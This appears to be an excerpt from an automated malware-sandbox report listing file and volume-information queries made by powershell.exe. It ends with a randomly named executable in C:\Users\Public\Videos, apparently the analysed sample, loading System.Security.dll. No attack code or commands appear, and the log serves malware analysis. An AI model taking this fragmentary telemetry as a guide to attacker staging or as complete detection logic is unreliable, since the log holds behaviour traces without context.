                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
